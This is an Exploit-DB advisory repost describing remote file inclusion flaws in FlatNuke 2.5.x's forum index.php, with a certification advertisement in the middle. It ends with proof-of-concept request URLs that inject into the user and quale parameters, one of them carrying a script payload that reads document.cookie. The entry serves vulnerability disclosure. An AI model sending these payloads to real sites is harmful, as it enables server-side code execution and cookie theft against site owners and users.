FlatNuke 2.5.x - 'index.php' Multiple Remote File Inclusions

EDB-ID:

26384




Platform:

PHP

Date:

2005-10-22


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

source: https://www.securityfocus.com/bid/15172/info

FlatNuke is prone to multiple remote file include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage any of these issues to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

It should be noted that a malicious user must have an account and be logged into the application to exploit these vulnerabilities. 

http://www.example.com/flatnuke/forum/index.php?op=profile&user=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=topic&quale=[abducter]
http://www.example.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1

http://www.example.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E